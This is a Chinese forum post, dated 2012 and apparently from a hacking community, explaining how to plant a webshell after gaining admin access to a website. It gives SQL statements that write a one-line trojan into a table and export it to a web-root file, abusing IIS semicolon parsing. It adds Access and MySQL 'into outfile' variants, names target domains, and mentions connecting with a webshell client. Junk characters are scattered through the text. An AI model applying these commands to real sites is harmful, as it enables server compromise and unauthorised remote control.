好不容易进了后台,发现啥上传啊。备份啊多木有。5 \# h" N8 G/ n! A6 I9 c) }
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
' W- k! \5 [- t/ C) T/ M文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,* a9 { K$ R7 ?8 w
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:4 h5 J' m& P" L! q/ m
1.create table cmd (a varchar(50))7 E+ R: ]9 T5 d6 M- N8 ^" K' Y& `
2.insert into cmd (a) values (‘‘)
( [' {; C# j7 I- A( A3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
! q' n0 q! ]' A(把表cmd的内容导出为物理路径的一个EXCEL文件)
; I' K& L' e- m1 j; R8 `8 J4.drop table cmd
' u, J# Y8 E6 Y! C利用IIS的BUG成功拿到了WEBSHELL。1 u' O- d8 d" ^) P0 z7 B* f
' e( D: G. W2 m
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话# q: y$ e' s- H n0 n
' Q( @$ _7 `% n SQL语句意思解释:! h* Y7 @4 p) Z; R8 b; h
第一句
- k6 _# t6 w' {& B# v5 x 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为509 f6 ?6 P0 `6 F
, }: w; Q* ~ {
第二句
- ^- I$ h" f# v* d* v! g 在表cmd的a字段插入一句话木马
- q8 n6 D" u9 k* A* O1 N 第三句, D* }; ^5 m; s2 G6 C
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
) Z6 u8 c9 z) M; K7 w' Q/ z. ^& m9 V- d! r6 K) ~( m& N" G3 x+ q* v
第四句5 U7 b, L& j9 m2 A" a5 C. f7 a6 `
删除建立的cmd表
. o. Y c' J e4 K/ Y" G# s
' p* S$ @; d# F" t 以下内容为测试:
$ {5 b4 W: a; i; G- E( ~4 f Access利用后台SQL执行命令功能导出WebShell:
1 x8 ]6 ]* c a0 O3 V$ D 这个更简单:
9 M* \; w* S- J: ]7 r0 V [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]1 t& E/ n! ^3 A/ z- g3 w- T
或者
N, A( B9 e" m2 v/ w& S [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]/ v' c: k" {6 U1 j
( q* {% J) J; L% H, d8 W 后台有执行SQL语句功能(vote为已知表段)
- z6 v4 [. M2 c: c 希望对大家有所帮助拿shell的又一个思路; q; v! P. f b; ]( T
|
发表于 2012-9-13 17:53:58
收藏
支持
反对